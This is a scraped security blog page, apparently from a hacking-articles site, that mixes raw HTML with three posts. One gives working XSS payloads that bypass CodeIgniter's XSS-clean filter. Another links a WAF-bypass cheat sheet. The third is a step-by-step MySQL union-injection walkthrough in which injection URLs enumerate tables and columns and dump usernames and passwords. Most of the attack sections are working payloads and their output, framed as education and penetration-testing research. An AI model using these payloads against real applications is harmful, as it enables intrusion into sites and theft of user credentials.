Founder of the "Wikileaks and Intelligence, Cypherpunks". Good communication in groups and the general public, attended college projects with a focus on business organization, he currently seeks work experience outside of brazil”. He frequently contributes at RHA and talks about various topics related to internet security. </span></div>

How To Capture Passwords Across The Air - Network Traffic Analysis

ABSTRACT      It is known that WireShark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are s...

+ Read more »

Code Igniter XSS Filter Multiple Bypasses

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdMPr_5AH68JXJLsTkB8AIWNc8KK-aqf-IXMaT8HCeDFqTtlgPTIcS4MBcxwZFCEOunA6SuOIrZBxPAyu5x70NWT0Km-W1mvFcrKwWLvdXBiMEyRL4rvhZEo1cZgiE4hxbT-oBrQEOQdw/s1600/download.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdMPr_5AH68JXJLsTkB8AIWNc8KK-aqf-IXMaT8HCeDFqTtlgPTIcS4MBcxwZFCEOunA6SuOIrZBxPAyu5x70NWT0Km-W1mvFcrKwWLvdXBiMEyRL4rvhZEo1cZgiE4hxbT-oBrQEOQdw/s400/download.jpg" width="400" /></a></div><br />Recently we released our "<a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank"><b>XSS Filter Evasion Cheat Sheet</b></a>", i was quite surprised to hear the community feedback. The total downloads have surpassed a figure of 2500, which was quite amazing considering that i didn't expect it to escalate that quickly.  Recently, i had a chance to test Code Igniter's XSS clean function, as it relied upon blacklist it caught my interest. I was pleased that almost all the payloads/techniques that were used to bypass the "XSSCLEAN" function have been already documented inside our "<b>XSS Filter Evasion Cheat Sheet</b>".<br /><a name='more'></a><h4>Vulnerability Details</h4>The test-bed i used was setup by @soaj1664ashar based upon the rules of the "XSS Clean" function inside of code igniter.<br /><b><br /></b><a href="http://xssplayground.net23.net/clean11.html">http://xssplayground.net23.net/clean11.html</a><br /><br />I managed to find lots of bypasses, however couple of them collided with what <b>@soaj1664ashar</b> had already found before. Therefore, i thought to publish the ones that did not collide with his vectors.<br /><h4>Bypass 1 - Null Bytes</h4>Internet explorer up to version 9, ignores null bytes every where. The XSSClean function was filtering for keywords like <script>, however it was not filtering out the null bytes. Therefore under Internet explorer 9 and below, the following is a valid vector executing javascript perfectly.<br /><br /><b><scr<span style="color: red;">\x00</span>ipt>confirm(1);</scr</b><b><span style="color: red;">\x00</span></b><b>ipt></b><br /><h4>Bypass 2 - SVG and XLINK</h4>The XSSCLEAN function was not filtering out the SVG tag and the xlink attribute. Along with it the XSSCLEAN function was also filtering out keywords such as javascript, vbscript etc. However this doesn't prevents us from executing javascript.<br /><b><br /></b><b>protected function _js_link_removal($match)</b><br /><b>{</b><br /><b>//echo "in link removal";</b><br /><b>return str_replace($match[1],</b><br /><b>preg_replace('#href=.*?(?:alert\(|alert&\#40;|javascript:|livescript:|mocha:|charset=|window\.|document\.|\.cookie|<script|<xss|data\s*:)#si',</b><br /><b>'',</b><br /><b>$this->_filter_attributes(str_replace(array('<', '>'), '', $match[1]))</b><br /><b>),</b><br /><b>$match[0]);</b><br /><b></b><br /><b>}</b><br /><br />The following payload manages to pass through the XSSCLEAN function of Codeigniter and yields a valid javascript:<br /><br /><b><svg xmlns:xlink=http://www.w3.org/1999/xlink><a><circle r=100 /><animate attributeName=<span style="color: #cc0000;">xlink:href</span> values=;<span style="color: #cc0000;">javas&Tab;cript&colon;confirm&lpar;1&rpar;</span> /></b><br /><b><br /></b><h4>Bypass 3 - HREF</h4><b><br /></b>Since, we were able bypass the blacklist that was looking for the keyword "javascript", we can use the href tag to execute valid javascript.<br /><br /><b><a/href=javas&Tab;cript&colon;confirm(top.location)>XSS</b><br /><b><br /></b>There are countless other variations thought.<br /><h4>Bypass 4 - Separators</h4>There are certain characters that get's parsed as whitespace characters, since the "Code Igniter" was not filtering out the space characters, they can be used to yield a valid javascript syntax inside various browsers. For more information on them, please refer to our "<b><a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank">XSS Filter Evasion Cheat Sheet</a></b>".<br /><h4>More Bypasses</h4>Ashar javed found various bypasses for CodeIgniter, if you are interested in more bypasses, please refer the link below: <br /><b><br /></b><a href="https://github.com/EllisLab/CodeIgniter/issues/2667"><b>https://github.com/EllisLab/CodeIgniter/issues/2667</b></a><br /><br /></div>

Code Igniter XSS Filter Multiple Bypasses

Recently we released our " XSS Filter Evasion Cheat Sheet ", i was quite surprised to hear the community feedback. The total downl...

+ Read more »

Bypassing Modern WAF's XSS Filters - Cheat Sheet

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwDvlqxmnoEZXNuKjqjGiLZQcSSRatJ4pOt5kdAegls01oayGeySV4vP_w4ZjM3roP0rWHD1tzea1Wt9jimA6Lu1-2FDjsSKb57L6CLu3DW7WQ1O4k06vn70G_6WYk_r7pi458L7oIH94/s640/1.png" width="470" /></div><br /><b><br /></b> Last month i was asked by my university teacher "Sir Asim Ali" to write a paper on any topic related to "Computer Architecture" as a semester project. I was particularly interested in writing security related stuff, let it be related to computer architecture, networks etc. However i found that lots of work has already been done on the architecture level security. Therefore, i convinced my teacher that i'll be writing on<b> "Bypassing Modern Web Application Firewall's"</b> as some of you might know that most of my research is related to client side vulnerabilities and bypassing WAF's.<br /><br /><a name='more'></a><br />In my day to day job as a penetration tester, it's very often that i encounter a web application firewall/filter that looks for malicious traffic inside the http request and filters it out, some of them are easy to break and some of them are very hard. However, in one or another context all the WAF's i have encountered are bypassable at some point.<br /><br />Rsnake's XSS cheat sheet was one of the best resources available for bypassing WAF's, however overtime as browsers got updated lots of the vectors didn't work on the newer browser. Therefore there was a need to create a new Cheat Sheet. Over time i have developed my own methodology for bypassing WAF's and that's what i have written the paper on. The paper talks specifically about bypassing XSS filters, as for SQLi, RCE etc. I thought to write a different paper as the techniques differ in many cases.<br /><br />  <b>Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf" rel="nofollow" target="_blank"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUT9yOZytMK3BOGrWPawfZkfer8OF-xDcyd7YjWtkMTfCBtLXq5tYCg8UwCP6xelRLOidRpA1vlz-8Ev-M2GNiREj4xTv_0NjCuD43rcxxTbQ8CaHX5p10GL7Lw2ZMLZEXqXJN-u-j0R8/s320/Download-button.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div>

Bypassing Modern WAF's XSS Filters - Cheat Sheet

Last month i was asked by my university teacher "Sir Asim Ali" to write a paper on any topic related to "Computer Architectu...

+ Read more »

Understanding This Technique Called MySQL Injection

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPVD722NLhkD1qRMWZXAjFvWZpPBUFiknqRjeugyujM7jmAFpJ3pN43UmefvhHSVPeEvpjCzyooVOBmmEmi0uYX9DnencrTUhh-5EvQac60qX8zC9NeI71dlKt880FdQk7WzDsRj30e0w/s1600/untitled1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPVD722NLhkD1qRMWZXAjFvWZpPBUFiknqRjeugyujM7jmAFpJ3pN43UmefvhHSVPeEvpjCzyooVOBmmEmi0uYX9DnencrTUhh-5EvQac60qX8zC9NeI71dlKt880FdQk7WzDsRj30e0w/s400/untitled1.JPG" width="400" /></a></div><h4 style="text-align: left;">ABSTRACT</h4>It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity.<br />Did you know that numerous inventions and discoveries are due to misconceptions?<br />There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pros software's for analysis and farredura vulnerabilities were unimproved by us.<br /><a name='more'></a><br /><h4 style="text-align: left;">Understand the technique MySQL Injection</h4>One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application.<br /><h4 style="text-align: left;">STEP BY STEP</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-L_Glh3qNVhNzVpJDdFLlP8YTU9RtsaCybN-VIC5PrU6VGn-2zRdL-pl6_rVr9FyVJc0gxcoMErKAeSeDgDvUm5za1y_p2yVa3JnV2cUaFLt_njp2JHnEgkGwqCXApxljW0ZoKxIuTI/s1600/untitled2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-L_Glh3qNVhNzVpJDdFLlP8YTU9RtsaCybN-VIC5PrU6VGn-2zRdL-pl6_rVr9FyVJc0gxcoMErKAeSeDgDvUm5za1y_p2yVa3JnV2cUaFLt_njp2JHnEgkGwqCXApxljW0ZoKxIuTI/s1600/untitled2.JPG" /></a></div><br /><b>Figure 1) Detecting.</b><br /><br /><br />Searching Column number (s): We will test earlier in error, then no error may be said to find.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVxG8HuJArdrdnD-3Q10iK3JpZDY4ZlhpyHfmTZJipiIu3SsWBN2-gO0V4DF4XMbFZGyIaVKdshEsZnQgGdm2EJGhwlCwTa1cYIC0jk61TpAoc54XVuG2SrnQ_sUqhFnrTOkkGYoFGkA/s1600/untitled3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVxG8HuJArdrdnD-3Q10iK3JpZDY4ZlhpyHfmTZJipiIu3SsWBN2-gO0V4DF4XMbFZGyIaVKdshEsZnQgGdm2EJGhwlCwTa1cYIC0jk61TpAoc54XVuG2SrnQ_sUqhFnrTOkkGYoFGkA/s1600/untitled3.JPG" /></a></div><br /><b>Figure 2) SQL error.</b><br /><br />Host Information,<br />Version of MySQL system used on the server.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZGZMCY1ajmC6oUODhVlrwBWRKw9VO22M0ku6DI3KQo149F2rSjmL8DiVO_fkv8crfFr0IkfcodZSLWnVd8Q7-P6XEWFzjg18SXbSoXaqCph_lEq-xaj3br_lMClD1snr1pdz-pXw7jFw/s1600/untitled4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZGZMCY1ajmC6oUODhVlrwBWRKw9VO22M0ku6DI3KQo149F2rSjmL8DiVO_fkv8crfFr0IkfcodZSLWnVd8Q7-P6XEWFzjg18SXbSoXaqCph_lEq-xaj3br_lMClD1snr1pdz-pXw7jFw/s1600/untitled4.JPG" /></a></div><br /><b>Figure 3) Host Information.</b><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUqWnJkReNWMDX-07jSmmo7-dcztkUzK5vU-tWn2s9VR7eesMd68oQzbXlQbDebBQgQLo0jdwGkzUcfazew5V81jB3kWpBfYDe6NDJ7dxAVhBGIR9Bi2wRPlUWIEzy-hRXl01qs2Ms7dQ/s1600/untitled5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUqWnJkReNWMDX-07jSmmo7-dcztkUzK5vU-tWn2s9VR7eesMd68oQzbXlQbDebBQgQLo0jdwGkzUcfazew5V81jB3kWpBfYDe6NDJ7dxAVhBGIR9Bi2wRPlUWIEzy-hRXl01qs2Ms7dQ/s1600/untitled5.JPG" /></a></div><b><br /></b><b>Figure 4) Location of the files</b><br /><br />Current database connection used between the "input" to the MySQL system.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi57HyUmwVDFsaMQTEiRJdM72TpVOd18YPr29hRfVZGpq_qgj7ietf2U3SI47PQC5Cq3XRwEr3-d_KZYltT2yL0TXMfJA6bmNxGilaAdX8RVsn1HHLQjt_U57U46XrzQ3seS8JYN_5I0RQ/s1600/untitled6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi57HyUmwVDFsaMQTEiRJdM72TpVOd18YPr29hRfVZGpq_qgj7ietf2U3SI47PQC5Cq3XRwEr3-d_KZYltT2yL0TXMfJA6bmNxGilaAdX8RVsn1HHLQjt_U57U46XrzQ3seS8JYN_5I0RQ/s1600/untitled6.JPG" /></a></div><br /><b>Figure 5) Users of MySQL</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyJeqOsgq_PY1uGFO8amnJUXsVuL6UDpi-4l8paWTwrkMAo2n1ECVVSbIQxQaPreX7jAQiX4hnqYEYe3bOU6N3GZFxSRGnpt0JYnDvYUTmytZyxslucj9kifEUB9l0wg7vRAQeiLcj6MI/s1600/untitled7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyJeqOsgq_PY1uGFO8amnJUXsVuL6UDpi-4l8paWTwrkMAo2n1ECVVSbIQxQaPreX7jAQiX4hnqYEYe3bOU6N3GZFxSRGnpt0JYnDvYUTmytZyxslucj9kifEUB9l0wg7vRAQeiLcj6MI/s1600/untitled7.JPG" /></a></div><br /><b>Figure 6) Current Time.</b><br /><br /><b>Brute Force or Shooting</b><br /><b><br /></b>This happens in versions below 5.x.y<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibvPkK8sd6Nv51nWf4joFjIDYEJPNG_IOKxM02uvCrwX2R0INQ-_DRzFdmOTJB9DE74ylX8HVxWGIEHLjDyQkYVRqk5_qAoWrM7gx5KWegLDC6ZgMW8uxyOwuMkwKXKIJcZVet_G1TvBs/s1600/untitled8.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibvPkK8sd6Nv51nWf4joFjIDYEJPNG_IOKxM02uvCrwX2R0INQ-_DRzFdmOTJB9DE74ylX8HVxWGIEHLjDyQkYVRqk5_qAoWrM7gx5KWegLDC6ZgMW8uxyOwuMkwKXKIJcZVet_G1TvBs/s1600/untitled8.JPG" /></a></div><br /><b>Figure 7) Testing.</b><br /><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;"><b>Dump<br />This happens in versions up 5.x.y [ 1º Method ] </b></div><div style="text-align: left;"><span style="color: #0b5394;"><br /></span></div><div style="text-align: left;"><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #990000;">1</span><span style="color: #ffd966;"> union all select </span><span style="color: #0b5394;">1,2,3,4</span>,<span style="color: #674ea7;">group_concat(table_name)</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">information_schema.tables</span> <span style="color: #f1c232;">where</span> <span style="color: #cc0000;">table_schema=</span><span style="color: #b45f06;">database()--</span></div><br /><span style="color: #674ea7;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span><br />or<br />Unknown column '<span style="color: #674ea7;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause</span>'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you</span>' at line 1<br /><br /><>------------------------<>-------------------------<>--------------------------<><br /><h4 style="text-align: left;">[ 2º Method ] </h4><span style="color: #0b5394;">http://[site]/query.php?string= </span><span style="color: #990000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #674ea7;">1,2,3,4</span>,<span style="color: #8e7cc3;">concat(table_name)</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">information_schema.tables </span><span style="color: #f1c232;">limit</span> <span style="color: #cc0000;">0,1</span><span style="color: #b45f06;">--</span><br /><span style="color: #674ea7;">CHARACTER_SETS</span><br />or<br />Unknown column '<span style="color: #674ea7;">CHARACTER_SETS</span>' in 'where clause'<br />ou<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">CHARACTER_SETS</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span><span style="color: #674ea7;"> </span><span style="color: #990000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #8e7cc3;">concat(table_name)</span><span style="color: #f1c232;"> from</span> <span style="color: #cc0000;">information_schema.tables</span> <span style="color: #f1c232;">limit</span> <span style="color: #cc0000;">1,2--</span><br /><span style="color: #674ea7;">COLLATIONS</span><br />or<br />Unknown column '<span style="color: #674ea7;">COLLATIONS</span>' in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">COLLATIONS</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #990000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">concat(table_name)</span> <span style="color: #f1c232;">from</span><span style="color: #cc0000;"> information_schema.tables </span><span style="color: #f1c232;">limit</span> <span style="color: #cc0000;">16,17--</span><br /><span style="color: #674ea7;">usuarios</span><br />or<br />Unknown column '<span style="color: #674ea7;">usuarios</span>' in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">usuarios</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #990000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #8e7cc3;">concat(table_name)</span> <span style="color: #cc0000;">from information_schema.tables </span><span style="color: #f1c232;">limit</span> <span style="color: #cc0000;">17,18--</span><br /><span style="color: #674ea7;">rafael</span><br />or<br />Unknown column '<span style="color: #674ea7;">rafael</span>' in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">rafael</span>' at line 1<br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><div style="text-align: left;"><b>Searching Column (s) of a given table<br />* Brute Force / Shooting<br />This happens in versions below 5.x.y</b></div><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #990000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">nome</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">usuarios-</span>-<br />Unknown column '<span style="color: #990000;">rafael1</span>' in 'field list'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #990000;">rafael1</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">churros</span> <span style="color: #f1c232;">from</span> <span style="background-color: white;"><span style="color: #cc0000;">usuarios--</span></span><br />Unknown column '<span style="color: #cc0000;">rafael1</span>' in 'field list'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #cc0000;">rafael1</span>' at line 1<br /><br />=--------------------------=<br /><span style="background-color: white;"><span style="color: #0b5394;">http://[site]/query.php?string=</span> </span><span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">login</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">usuarios--</span><br /><span style="color: #674ea7;">_Rafa_</span><br />or<br />Unknown column '<span style="color: #674ea7;">_Rafa_</span>' in 'field list'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #351c75;">_Rafa_</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1 </span><span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">passwd</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">usuarios--</span><br /><span style="color: #674ea7;">rafael1337</span><br />or<br />Unknown column '<span style="color: #674ea7;">rafael1337</span>' in 'field list'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">rafael1337</span>' at line 1<br /><br />=--------------------------=--------------------------=--------------------------=--------------------------=<br /><div style="text-align: left;"><b>Dump<br />This happens in versions up 5.x.y [ 1º Method ] </b></div>"<span style="color: #cc0000;">usuarios</span>" hexadecimal -> "<span style="color: #cc0000;">7573756172696f73</span>"<br /><br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1 </span><span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">group_concat(column_name)</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">information_schema.columns</span> <span style="color: #f1c232;">where</span> <span style="color: #cc0000;">table_name=</span><span style="color: #b45f06;">0x7573756172696f73--</span><br /><span style="color: #674ea7;">login,passwd,id,texto</span><br />or<br />Unknown column '<span style="color: #674ea7;">login,passwd,id,texto</span>' in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">login,passwd,id,texto</span>' at line 1<br /><br /><>------------------------<>-------------------------<>--------------------------<><br /><h4 style="text-align: left;">[ 2º Method ] </h4>"<span style="color: #b45f06;">usuarios</span>" decimal -> "<span style="color: #b45f06;">117,115,117,97,114,105,111,115</span>"<br /><br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">concat(column_name)</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">information_schema.columns</span> <span style="color: #f1c232;">where</span><br /><span style="color: #cc0000;">table_name=char</span>(<span style="color: #b45f06;">117,115,117,97,114,105,111,115</span>)<span style="color: #f1c232;"> limit</span> <span style="color: #cc0000;">0,1--</span><br /><span style="color: #674ea7;">login</span><br />or<br />Unknown column '<span style="color: #674ea7;">login</span>' in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">login</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">concat(column_name)</span> <span style="color: #f1c232;">from </span><span style="color: #cc0000;">information_schema.columns</span> <span style="color: #f1c232;">where</span><br /><span style="color: #cc0000;">table_name=char</span>(<span style="color: #b45f06;">117,115,117,97,114,105,111,115</span>) <span style="color: #f1c232;">limit</span> <span style="color: #cc0000;">1,2--</span><br /><span style="color: #674ea7;">passwd</span><br />or<br />Unknown column '<span style="color: #674ea7;">passwd</span>' in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">passwd</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">concat(column_name) </span><span style="color: #f1c232;">from </span><span style="color: #cc0000;">information_schema.columns</span> <span style="color: #f1c232;">where</span><br /><span style="color: #cc0000;">table_name=char</span>(<span style="color: #b45f06;">117,115,117,97,114,105,111,115</span>) <span style="color: #f1c232;">limit</span> <span style="color: #cc0000;">2,3--</span><br /><span style="color: #674ea7;">id</span><br />or<br />Unknown column '<span style="color: #674ea7;">id'</span> in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">id</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4,</span><span style="color: #674ea7;">concat(column_name)</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">information_schema.columns</span> <span style="color: #f1c232;">where</span><br /><span style="color: #cc0000;">table_name=char</span>(<span style="color: #b45f06;">117,115,117,97,114,105,111,115</span>) <span style="color: #f1c232;">limit</span> <span style="color: #cc0000;">3,4--</span><br /><span style="color: #674ea7;">text</span><br />or<br />Unknown column '<span style="color: #674ea7;">text</span>' in 'where clause'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">text</span>' at line 1<br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><div style="text-align: left;"><b>Extracting data from the columns of a given table</b></div><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #674ea7;">1,2,3,4,concat(login,0x20,0x3a,0x20,senha)</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">usuarios--</span><br /><span style="color: #674ea7;">_Rafa_ : fontes1337</span><br />or<br />Unknown column '<span style="color: #674ea7;">_Rafa_ : fontes1337</span>' in 'field list'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">_Rafa_ : fontes1337</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span> <span style="color: #351c75;">1,2,3,4</span>,<span style="color: #674ea7;">group_concat(login,0x20,0x3a,0x20,senha)</span> <span style="color: #f1c232;">from</span> <span style="color: #cc0000;">usuarios--</span><br /><span style="color: #674ea7;">_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec</span><br />or<br />Unknown column '<span style="color: #674ea7;">_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec </span>‘in 'field list'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec</span>' at line 1<br /><br />=--------------------------=<br /><span style="color: #0b5394;">http://[site]/query.php?string=</span> <span style="color: #cc0000;">1</span> <span style="color: #f1c232;">union all select</span><br /><span style="color: #0b5394;">1,2,3,4</span><span style="color: #674ea7;">,concat_ws(0x20,0x3a,0x20,login,senha)</span> <span style="color: #f1c232;">from</span><span style="color: #f1c232;"> </span><span style="color: #cc0000;">usuarios--</span><br /><span style="color: #674ea7;">_RHA_ : infosec1337</span><br />or<br />Unknown column '<span style="color: #674ea7;">_RHA_ : infosec1337</span>‘ in 'field list'<br />or<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<span style="color: #674ea7;">_RHA_ : infosec1337</span>’ at line 1<br /><br />=--------------------------=<br /><div style="text-align: left;"><b>Concat </b></div>group_concat() => Search all you want with ascii caracters<br />concat() => search what you want with ascii caracters<br />concat_ws() => unite<br /><div style="text-align: left;"><b>Hexadecimal </b></div>0x3a => :<br />0x20 => space<br />0x2d => -<br />0x2b => +<br /><br />Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.<br />It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researchs and developers to beware and test your code.<br /><h4 style="text-align: left;">CONCLUSION</h4>Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?<br />The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.<br />The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.<br /><h4 style="text-align: left;">ABOUT THE AUTHOR:</h4><div class="separator" style="clear: both; text-align: center;"><a 